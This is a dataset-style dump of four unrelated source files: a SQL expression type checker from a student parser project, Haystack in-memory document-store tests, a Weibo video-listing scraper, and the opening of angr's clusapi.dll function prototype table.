parser/fase2/team26/G26/C3D/expresiones.py
|
webdev188/tytus
|
847071edb17b218f51bb969d335a8ec093d13f94
|
[
"MIT"
] | 47
|
2020-12-09T01:29:09.000Z
|
2021-01-13T05:37:50.000Z
|
parser/fase2/team26/G26/C3D/expresiones.py
|
webdev188/tytus
|
847071edb17b218f51bb969d335a8ec093d13f94
|
[
"MIT"
] | 556
|
2020-12-07T03:13:31.000Z
|
2021-06-17T17:41:10.000Z
|
import sys
sys.path.append('../G26/Utils')
sys.path.append('../G26/Expresiones')
from Error import *
from Primitivo import *
def compararTiposBin(arg1, arg2, sign):
try:
s = arg1.type
l = arg1
except:
''
try:
s = arg2.type
r = arg2
except:
''
if arg1.type == 'error':
return arg1
if arg2.type == 'error':
return arg2
left = l
right = r
if sign == '+':
if left.type == 'integer' or left.type == 'float' or left.type == 'money':
if right.type == 'integer' or right.type == 'float' or right.type == 'money':
if left.type == 'float' or right.type == 'float' or left.type == 'money' or right.type == 'money':
return Primitive('float', '')
return Primitive('integer', '')
return Error('Semántico', 'Error de tipos en MAS, no se puede operar ' + left.type + ' con ' + right.type, 0, 0)
if sign == '-':
if left.type == 'integer' or left.type == 'float' or left.type == 'money':
if right.type == 'integer' or right.type == 'float' or right.type == 'money':
if left.type == 'float' or right.type == 'float' or left.type == 'money' or right.type == 'money':
return Primitive('float', '')
return Primitive('integer', '')
return Error('Semántico', 'Error de tipos en MENOS, no se puede operar ' + left.type + ' con ' + right.type, 0, 0)
if sign == '/':
if left.type == 'integer' or left.type == 'float':
if right.type == 'integer' or right.type == 'float':
if right.val == 0:
return Error('Semántico', 'No es posible la division con 0', 0, 0)
return Primitive('float', '')
return Error('Semántico', 'Error de tipos en DIVISION, no se puede operar ' + left.type + ' con ' + right.type, 0, 0)
if sign == '*':
if left.type == 'integer' or left.type == 'float' or left.type == 'money':
if right.type == 'integer' or right.type == 'float' or right.type == 'money':
if left.type == 'float' or right.type == 'float' or left.type == 'money' or right.type == 'money':
return Primitive('float', '')
return Primitive('integer', '')
return Error('Semántico', 'Error de tipos en MULTIPLICACION, no se puede operar ' + left.type + ' con ' + right.type, 0, 0)
if sign == '%':
if left.type == 'integer' or left.type == 'float':
if right.type == 'integer' or right.type == 'float':
return Primitive('integer', '')
return Error('Semántico', 'Error de tipos en PORCENTAJE, no se puede operar ' + left.type + ' con ' + right.type, 0, 0)
if sign == '^':
if left.type == 'integer' or left.type == 'float' or left.type == 'money':
if right.type == 'integer' or right.type == 'float' or right.type == 'money':
if left.type == 'float' or right.type == 'float' or left.type == 'money' or right.type == 'money':
return Primitive('float', '')
return Primitive('integer', '')
return Error('Semántico', 'Error de tipos en POTENCIA, no se puede operar ' + left.type + ' con ' + right.type, 0, 0)
return Primitive('float', '')
def compararTiposCon(arg1, arg2, sign, arg3):
try:
s = arg1.type
l = arg1
except:
''
try:
s = arg2.type
r = arg2
except:
r = ''
try:
s = arg3.type
e = arg3
except:
e = ''
print(arg1)
print(arg2)
print(arg3)
if arg1.type == 'error':
return arg1
try:
if arg2.type == 'error':
return arg2
except:
''
try:
if arg3.type == 'error':
return arg3
except:
''
left = l
right = r
extra = e
if sign == '<':
if left.type == 'integer' or left.type == 'float' or left.type == 'money':
if right.type == 'integer' or right.type == 'float' or right.type == 'money':
return Primitive('boolean', '')
if left.type == 'string' or left.type == 'date' or left.type == 'time':
if right.type == 'string' or right.type == 'date' or right.type == 'time':
return Primitive('boolean', '')
return Error('Semántico', 'Error de tipos en MENOR QUE, no se puede operar ' + left.type + ' con ' + right.type, 0, 0)
if sign == '<=':
if left.type == 'integer' or left.type == 'float' or left.type == 'money':
if right.type == 'integer' or right.type == 'float' or right.type == 'money':
return Primitive('boolean', '')
if left.type == 'string' or left.type == 'date' or left.type == 'time':
if right.type == 'string' or right.type == 'date' or right.type == 'time':
return Primitive('boolean', '')
return Error('Semántico', 'Error de tipos en MENOR IGUAL QUE, no se puede operar ' + left.type + ' con ' + right.type, 0, 0)
if sign == '>':
if left.type == 'integer' or left.type == 'float' or left.type == 'money':
if right.type == 'integer' or right.type == 'float' or right.type == 'money':
return Primitive('boolean', '')
if left.type == 'string' or left.type == 'date' or left.type == 'time':
if right.type == 'string' or right.type == 'date' or right.type == 'time':
return Primitive('boolean', '')
if left.type == 'boolean' and right.type == 'boolean':
return Primitive('boolean', '')
return Error('Semántico', 'Error de tipos en MAYOR QUE, no se puede operar ' + left.type + ' con ' + right.type, 0, 0)
if sign == '>=':
if left.type == 'integer' or left.type == 'float' or left.type == 'money':
if right.type == 'integer' or right.type == 'float' or right.type == 'money':
return Primitive('boolean', '')
if left.type == 'string' or left.type == 'date' or left.type == 'time':
if right.type == 'string' or right.type == 'date' or right.type == 'time':
return Primitive('boolean', '')
if left.type == 'boolean' and right.type == 'boolean':
return Primitive('boolean', '')
return Error('Semántico', 'Error de tipos en MAYOR IGUAL QUE, no se puede operar ' + left.type + ' con ' + right.type, 0, 0)
if sign == '=':
if left.type == 'integer' or left.type == 'float' or left.type == 'money':
if right.type == 'integer' or right.type == 'float' or right.type == 'money':
return Primitive('boolean', '')
if left.type == 'string' or left.type == 'date' or left.type == 'time':
if right.type == 'string' or right.type == 'date' or right.type == 'time':
return Primitive('boolean', '')
if left.type == 'boolean' and right.type == 'boolean':
return Primitive('boolean', '')
return Error('Semántico', 'Error de tipos en IGUAL, no se puede operar ' + left.type + ' con ' + right.type, 0, 0)
if sign == '<>' or sign == '!=':
if left.type == 'integer' or left.type == 'float' or left.type == 'money':
if right.type == 'integer' or right.type == 'float' or right.type == 'money':
return Primitive('boolean', '')
if left.type == 'string' or left.type == 'date' or left.type == 'time':
if right.type == 'string' or right.type == 'date' or right.type == 'time':
return Primitive('boolean', '')
if left.type == 'boolean' and right.type == 'boolean':
return Primitive('boolean', '')
return Error('Semántico', 'Error de tipos en DIFERENTE, no se puede operar ' + left.type + ' con ' + right.type, 0, 0)
if sign == 'between' or sign == 'not':
if left.type == 'integer' or left.type == 'float' or left.type == 'money':
if right.type == 'integer' or right.type == 'float' or right.type == 'money':
if extra.type == 'integer' or extra.type == 'float' or extra.type == 'money':
return Primitive('boolean', '')
if left.type == 'string' or left.type == 'date' or left.type == 'time':
if right.type == 'string' or right.type == 'date' or right.type == 'time':
if extra.type == 'integer' or extra.type == 'float' or extra.type == 'money':
return Primitive('boolean', '')
if left.type == 'boolean' and right.type == 'boolean' and extra.type == 'boolean':
return Primitive('boolean', '')
return Error('Semántico', 'Error de tipos en BETWEEN, no se puede operar ' + left.type + ' con ' + right.type, 0, 0)
return Primitive('boolean', '')
| 45.564103
| 132
| 0.530895
| 1,106
| 8,885
| 4.264919
| 0.060579
| 0.142463
| 0.107272
| 0.057664
| 0.907144
| 0.90142
| 0.88022
| 0.873013
| 0.873013
| 0.873013
| 0
| 0.010044
| 0.305234
| 8,885
| 194
| 133
| 45.798969
| 0.75409
| 0
| 0
| 0.722892
| 0
| 0
| 0.218571
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.012048
| false
| 0
| 0.018072
| 0
| 0.331325
| 0.018072
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d78f57ba200fa1a90dcecc8c5ffdf08a3e4320c0
| 4,444
|
py
|
Python
|
test/test_in_memory_store.py
|
arthurbarros/haystack
|
886f5ba90ed15aecd10c509a8e57334eefcf69c2
|
[
"Apache-2.0"
] | null | null | null |
test/test_in_memory_store.py
|
arthurbarros/haystack
|
886f5ba90ed15aecd10c509a8e57334eefcf69c2
|
[
"Apache-2.0"
] | null | null | null |
test/test_in_memory_store.py
|
arthurbarros/haystack
|
886f5ba90ed15aecd10c509a8e57334eefcf69c2
|
[
"Apache-2.0"
] | null | null | null |
from haystack import Finder
from haystack.reader.transformers import TransformersReader
from haystack.retriever.tfidf import TfidfRetriever
def test_finder_get_answers_with_in_memory_store():
test_docs = [
{"name": "testing the finder 1", "text": "testing the finder with pyhton unit test 1", 'meta': {'url': 'url'}},
{"name": "testing the finder 2", "text": "testing the finder with pyhton unit test 2", 'meta': {'url': 'url'}},
{"name": "testing the finder 3", "text": "testing the finder with pyhton unit test 3", 'meta': {'url': 'url'}}
]
from haystack.database.memory import InMemoryDocumentStore
document_store = InMemoryDocumentStore()
document_store.write_documents(test_docs)
retriever = TfidfRetriever(document_store=document_store)
reader = TransformersReader(model="distilbert-base-uncased-distilled-squad",
tokenizer="distilbert-base-uncased", use_gpu=-1)
finder = Finder(reader, retriever)
prediction = finder.get_answers(question="testing finder", top_k_retriever=10,
top_k_reader=5)
assert prediction is not None
def test_memory_store_get_by_tags():
test_docs = [
{"name": "testing the finder 1", "text": "testing the finder with pyhton unit test 1", 'meta': {'url': 'url'}},
{"name": "testing the finder 2", "text": "testing the finder with pyhton unit test 2", 'meta': {'url': None}},
{"name": "testing the finder 3", "text": "testing the finder with pyhton unit test 3", 'meta': {'url': 'url'}}
]
from haystack.database.memory import InMemoryDocumentStore
document_store = InMemoryDocumentStore()
document_store.write_documents(test_docs)
docs = document_store.get_document_ids_by_tags({'has_url': 'false'})
assert docs == []
def test_memory_store_get_by_tag_lists_union():
test_docs = [
{"name": "testing the finder 1", "text": "testing the finder with pyhton unit test 1", 'meta': {'url': 'url'}, 'tags': [{'tag2': ["1"]}]},
{"name": "testing the finder 2", "text": "testing the finder with pyhton unit test 2", 'meta': {'url': None}, 'tags': [{'tag1': ['1']}]},
{"name": "testing the finder 3", "text": "testing the finder with pyhton unit test 3", 'meta': {'url': 'url'}, 'tags': [{'tag2': ["1", "2"]}]}
]
from haystack.database.memory import InMemoryDocumentStore
document_store = InMemoryDocumentStore()
document_store.write_documents(test_docs)
docs = document_store.get_document_ids_by_tags({'tag2': ["1"]})
assert docs == [
{'name': 'testing the finder 1', 'text': 'testing the finder with pyhton unit test 1', 'meta': {'url': 'url'}, 'tags': [{'tag2': ['1']}]},
{'name': 'testing the finder 3', 'text': 'testing the finder with pyhton unit test 3', 'meta': {'url': 'url'}, 'tags': [{'tag2': ['1', '2']}]}
]
def test_memory_store_get_by_tag_lists_non_existent_tag():
test_docs = [
{"name": "testing the finder 1", "text": "testing the finder with pyhton unit test 1", 'meta': {'url': 'url'}, 'tags': [{'tag1': ["1"]}]},
]
from haystack.database.memory import InMemoryDocumentStore
document_store = InMemoryDocumentStore()
document_store.write_documents(test_docs)
docs = document_store.get_document_ids_by_tags({'tag1': ["3"]})
assert docs == []
def test_memory_store_get_by_tag_lists_disjoint():
test_docs = [
{"name": "testing the finder 1", "text": "testing the finder with pyhton unit test 1", 'meta': {'url': 'url'}, 'tags': [{'tag1': ["1"]}]},
{"name": "testing the finder 2", "text": "testing the finder with pyhton unit test 2", 'meta': {'url': None}, 'tags': [{'tag2': ['1']}]},
{"name": "testing the finder 3", "text": "testing the finder with pyhton unit test 3", 'meta': {'url': 'url'}, 'tags': [{'tag3': ["1", "2"]}]},
{"name": "testing the finder 4", "text": "testing the finder with pyhton unit test 3", 'meta': {'url': 'url'}, 'tags': [{'tag3': ["1", "3"]}]}
]
from haystack.database.memory import InMemoryDocumentStore
document_store = InMemoryDocumentStore()
document_store.write_documents(test_docs)
docs = document_store.get_document_ids_by_tags({'tag3': ["3"]})
assert docs == [{'name': 'testing the finder 4', 'text': 'testing the finder with pyhton unit test 3', 'meta': {'url': 'url'}, 'tags': [{'tag3': ['1', '3']}]}]
| 51.08046
| 163
| 0.638164
| 567
| 4,444
| 4.844797
| 0.121693
| 0.123771
| 0.198034
| 0.123771
| 0.819075
| 0.819075
| 0.804878
| 0.80233
| 0.791045
| 0.791045
| 0
| 0.019684
| 0.188344
| 4,444
| 86
| 164
| 51.674419
| 0.741891
| 0
| 0
| 0.430769
| 0
| 0
| 0.350585
| 0.013951
| 0
| 0
| 0
| 0
| 0.076923
| 1
| 0.076923
| false
| 0
| 0.123077
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d79076f8a625f064bd9acb31291e908a6130ef52
| 5,393
|
py
|
Python
|
step1/weibo.py
|
karoyqiu/xbmc-kodi-private-china-addons
|
e63026c15a72736f7a9d04480639891979b36cca
|
[
"MIT"
] | 420
|
2020-03-03T06:41:55.000Z
|
2022-03-31T00:10:43.000Z
|
step1/weibo.py
|
karoyqiu/xbmc-kodi-private-china-addons
|
e63026c15a72736f7a9d04480639891979b36cca
|
[
"MIT"
] | 21
|
2020-05-19T00:05:14.000Z
|
2022-02-18T16:34:31.000Z
|
step1/weibo.py
|
karoyqiu/xbmc-kodi-private-china-addons
|
e63026c15a72736f7a9d04480639891979b36cca
|
[
"MIT"
] | 72
|
2020-04-06T13:15:39.000Z
|
2022-03-31T23:23:51.000Z
|
#热门推荐(纪录片,评测,娱乐都没有)
import json
import requests
import re
from bs4 import BeautifulSoup
import urllib
url = 'https://weibo.com/video/aj/load?ajwvr=6&page=2&type=channel&hot_recommend_containerid=video_tag_15&__rnd=1584096137063'
cookies = dict(SUB='_2AkMpN-raf8NxqwJRmfoXxGniZIl_ygvEieKfaxsBJRMxHRl-yj92qhFTtRB6ArfENQBVM_xipNLvZYca4pNo4lw7p9Xi')
headers = {'user-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'}
rec = requests.get(url,headers=headers,cookies=cookies)
rec.encoding = 'utf-8'
rectext = rec.text
print(rectext)
num = re.sub(r'\\n', "", rectext)
num = re.sub(r'\\', "", num)
print(num)
soup = BeautifulSoup(num, 'html.parser')
list = soup.find_all('div',class_='V_list_a')
print(len(list))
for index in range(len(list)):
#soup = BeautifulSoup(list[index], 'html.parser')
videosource = list[index]['video-sources']
videosource = urllib.parse.unquote(videosource,encoding='utf-8',errors='replace')
videosource = urllib.parse.unquote(videosource,encoding='utf-8',errors='replace')
videosource = videosource[8:]
mp4 = videosource.split('http:')
#q = videosource
imgsrc = list[index].find('img')
imgsrc = imgsrc['src']
title = list[index]['action-data']
str1 = title.find('&title=')
str2 = title.find('&uid=')
title = title[str1+7:str2]
title = urllib.parse.unquote(title,encoding='utf-8',errors='replace')
print(title)
print('http:' + imgsrc[6:])
print('http:' + mp4[0])
print('*******'*30)
#编辑推荐
import json
import requests
import re
from bs4 import BeautifulSoup
import urllib
url = 'https://weibo.com/tv?type=channel&first_level_channel_id=4453781547450385&broadcast_id=4476916414218244'
cookies = dict(SUB='_2AkMpN-raf8NxqwJRmfoXxGniZIl_ygvEieKfaxsBJRMxHRl-yj92qhFTtRB6ArfENQBVM_xipNLvZYca4pNo4lw7p9Xi')
headers = {'user-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'}
rec = requests.get(url,headers=headers,cookies=cookies)
rec.encoding = 'utf-8'
rectext = rec.text
#print(rectext)
soup = BeautifulSoup(rectext, 'html.parser')
list = soup.find_all('div',class_='V_list_a')
for index in range(len(list)):
videosource = list[index]['video-sources']
videosource = urllib.parse.unquote(videosource,encoding='utf-8',errors='replace')
videosource = urllib.parse.unquote(videosource,encoding='utf-8',errors='replace')
videosource = videosource[8:]
mp4 = videosource.split('http:')
img = list[index].find('img')
img = img['src']
if img[0:4] == 'http':
img = 'http' + img[5:]
else:
img = 'http:' + img
title = list[index].find('h3')
print(title.text)
print(img)
print('http:' + mp4[len(mp4)-1])
#排行榜
import json
import requests
import re
from bs4 import BeautifulSoup
import urllib
url = 'https://weibo.com/tv?type=dayrank'
cookies = dict(SUB='_2AkMpN-raf8NxqwJRmfoXxGniZIl_ygvEieKfaxsBJRMxHRl-yj92qhFTtRB6ArfENQBVM_xipNLvZYca4pNo4lw7p9Xi')
headers = {'user-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'}
rec = requests.get(url,headers=headers,cookies=cookies)
rec.encoding = 'utf-8'
rectext = rec.text
#print(rectext)
soup = BeautifulSoup(rectext, 'html.parser')
list = soup.find_all('div',class_='V_list_a')
for index in range(len(list)):
videosource = list[index]['video-sources']
videosource = urllib.parse.unquote(videosource,encoding='utf-8',errors='replace')
videosource = urllib.parse.unquote(videosource,encoding='utf-8',errors='replace')
videosource = videosource[8:]
mp4 = videosource.split('http:')
img = list[index].find('img')
img = img['src']
if img[0:4] == 'http':
img = 'http' + img[5:]
else:
img = 'http:' + img
title = list[index].find('h3')
title = title.text
title = title.replace(' ', '').replace('\n','')
if len(title) > 40:
title = title[:40] + '...'
print(title)
print(img)
print('http:' + mp4[len(mp4)-1])
# Stories ("故事")
import json
import requests
import re
from bs4 import BeautifulSoup
import urllib.parse
url = 'https://weibo.com/tv?type=story'
cookies = dict(SUB='_2AkMpN-raf8NxqwJRmfoXxGniZIl_ygvEieKfaxsBJRMxHRl-yj92qhFTtRB6ArfENQBVM_xipNLvZYca4pNo4lw7p9Xi')
headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'}
rec = requests.get(url, headers=headers, cookies=cookies)
rec.encoding = 'utf-8'
rectext = rec.text
soup = BeautifulSoup(rectext, 'html.parser')
items = soup.find_all('div', class_='V_list_b')
for index in range(len(items)):
    # Skip live-stream entries; only regular story videos carry a usable video source.
    if items[index]['action-data'][:9] == 'type=live':
        continue
    videosource = items[index]['video-sources']
    videosource = urllib.parse.unquote(videosource, encoding='utf-8', errors='replace')
    videosource = urllib.parse.unquote(videosource, encoding='utf-8', errors='replace')
    videosource = videosource[8:]
    mp4 = videosource.split('http:')
    img = items[index].find('img')['src']
    if img[0:4] == 'http':
        img = 'http' + img[5:]
    else:
        img = 'http:' + img
    # Extract the like count from the 'like' div (printed with the original '赞' suffix).
    like = items[index].find('div', class_='like').text
    likenum = re.findall(r'\d+', like)
    print(likenum[0] + '赞')
    print(img)
    print('http:' + mp4[len(mp4) - 1])
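# Illustrative sketch (not part of the original script): the three tab scrapers above
# differ only in the requested URL and the item class, so the fetch step could be shared.
# fetch_tab is a hypothetical helper; cookies and headers are the dicts defined above.
def fetch_tab(url, cookies, headers, item_class='V_list_a'):
    """Fetch a weibo.com/tv tab and return its parsed video item divs."""
    resp = requests.get(url, headers=headers, cookies=cookies)
    resp.encoding = 'utf-8'
    soup = BeautifulSoup(resp.text, 'html.parser')
    return soup.find_all('div', class_=item_class)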
| 30.468927
| 144
| 0.698683
| 742
| 5,393
| 5.025606
| 0.181941
| 0.036203
| 0.041834
| 0.043443
| 0.814159
| 0.800751
| 0.788951
| 0.788951
| 0.76723
| 0.76723
| 0
| 0.055981
| 0.128871
| 5,393
| 177
| 145
| 30.468927
| 0.737761
| 0.027814
| 0
| 0.755725
| 0
| 0.038168
| 0.308177
| 0.071838
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.152672
| 0
| 0.152672
| 0.122137
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| ad5f9d9a2bb3b2591d04a9e45b96929d3bd5a002
| 94,767
| py
| Python
| angr/procedures/definitions/win32_clusapi.py
| r4b3rt/angr
| c133cfd4f83ffea2a1d9e064241e9459eaabc55f
| [ "BSD-2-Clause" ] | null | null | null
| angr/procedures/definitions/win32_clusapi.py
| r4b3rt/angr
| c133cfd4f83ffea2a1d9e064241e9459eaabc55f
| [ "BSD-2-Clause" ] | null | null | null
| angr/procedures/definitions/win32_clusapi.py
| r4b3rt/angr
| c133cfd4f83ffea2a1d9e064241e9459eaabc55f
| [ "BSD-2-Clause" ] | null | null | null |
# pylint:disable=line-too-long
import logging
from ...sim_type import SimTypeFunction, SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat, SimTypePointer, SimTypeChar, SimStruct, SimTypeFixedSizeArray, SimTypeBottom, SimUnion, SimTypeBool
from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64
from .. import SIM_PROCEDURES as P
from . import SimLibrary
_l = logging.getLogger(name=__name__)
lib = SimLibrary()
lib.set_default_cc('X86', SimCCStdcall)
lib.set_default_cc('AMD64', SimCCMicrosoftAMD64)
lib.set_library_names("clusapi.dll")
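# Each entry in the dictionary below maps an exported clusapi.dll function name to a
# SimTypeFunction describing its parameter types, return type, and parameter names,
# which lets angr model calls into the cluster API using the calling conventions
# configured above (stdcall on X86, the Microsoft convention on AMD64).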
prototypes = \
{
#
'GetNodeClusterState': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpszNodeName", "pdwClusterState"]),
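# How to read an entry: the first argument to SimTypeFunction is the list of parameter
# types, the second is the return type, and arg_names lists the Win32 parameter names in
# the same order. GetNodeClusterState above, for example, takes a node-name string pointer
# and a UInt32 output pointer and returns a UInt32 status code.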
#
'OpenCluster': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), arg_names=["lpszClusterName"]),
#
'OpenClusterEx': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), arg_names=["lpszClusterName", "DesiredAccess", "GrantedAccess"]),
#
'CloseCluster': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hCluster"]),
#
'SetClusterName': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "lpszNewClusterName"]),
#
'GetClusterInformation': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimStruct({"dwVersionInfoSize": SimTypeInt(signed=False, label="UInt32"), "MajorVersion": SimTypeShort(signed=False, label="UInt16"), "MinorVersion": SimTypeShort(signed=False, label="UInt16"), "BuildNumber": SimTypeShort(signed=False, label="UInt16"), "szVendorId": SimTypeFixedSizeArray(SimTypeChar(label="Char"), 64), "szCSDVersion": SimTypeFixedSizeArray(SimTypeChar(label="Char"), 64), "dwClusterHighestVersion": SimTypeInt(signed=False, label="UInt32"), "dwClusterLowestVersion": SimTypeInt(signed=False, label="UInt32"), "dwFlags": SimTypeInt(signed=False, label="UInt32"), "dwReserved": SimTypeInt(signed=False, label="UInt32")}, name="CLUSTERVERSIONINFO", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "lpszClusterName", "lpcchClusterName", "lpClusterInfo"]),
#
'GetClusterQuorumResource': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "lpszResourceName", "lpcchResourceName", "lpszDeviceName", "lpcchDeviceName", "lpdwMaxQuorumLogSize"]),
#
'SetClusterQuorumResource': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hResource", "lpszDeviceName", "dwMaxQuoLogSize"]),
#
'BackupClusterDatabase': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "lpszPathName"]),
#
'RestoreClusterDatabase': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=True, label="Int32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpszPathName", "bForce", "lpszQuorumDriveLetter"]),
#
'SetClusterNetworkPriorityOrder': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypePointer(SimStruct({}, name="_HNETWORK", pack=False, align=None), offset=0), label="LPArray", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "NetworkCount", "NetworkList"]),
#
'SetClusterServiceAccountPassword': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"NodeId": SimTypeInt(signed=False, label="UInt32"), "SetAttempted": SimTypeChar(label="Byte"), "ReturnStatus": SimTypeInt(signed=False, label="UInt32")}, name="CLUSTER_SET_PASSWORD_STATUS", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpszClusterName", "lpszNewPassword", "dwFlags", "lpReturnStatusBuffer", "lpcbReturnStatusBufferSize"]),
#
'ClusterControl': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "hHostNode", "dwControlCode", "lpInBuffer", "nInBufferSize", "lpOutBuffer", "nOutBufferSize", "lpBytesReturned"]),
#
'ClusterUpgradeFunctionalLevel': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypeInt(signed=True, label="Int32"), SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="CLUSTER_UPGRADE_PHASE")], SimTypeInt(signed=True, label="Int32"), arg_names=["pvCallbackArg", "eUpgradePhase"]), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "perform", "pfnProgressCallback", "pvCallbackArg"]),
#
'CreateClusterNotifyPortV2': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCHANGE", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"dwObjectType": SimTypeInt(signed=False, label="UInt32"), "FilterFlags": SimTypeLongLong(signed=True, label="Int64")}, name="NOTIFY_FILTER_AND_TYPE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0)], SimTypePointer(SimStruct({}, name="_HCHANGE", pack=False, align=None), offset=0), arg_names=["hChange", "hCluster", "Filters", "dwFilterCount", "dwNotifyKey"]),
#
'RegisterClusterNotifyV2': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCHANGE", pack=False, align=None), offset=0), SimStruct({"dwObjectType": SimTypeInt(signed=False, label="UInt32"), "FilterFlags": SimTypeLongLong(signed=True, label="Int64")}, name="NOTIFY_FILTER_AND_TYPE", pack=False, align=None), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hChange", "Filter", "hObject", "dwNotifyKey"]),
#
'GetNotifyEventHandle': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCHANGE", pack=False, align=None), offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hChange", "lphTargetEvent"]),
#
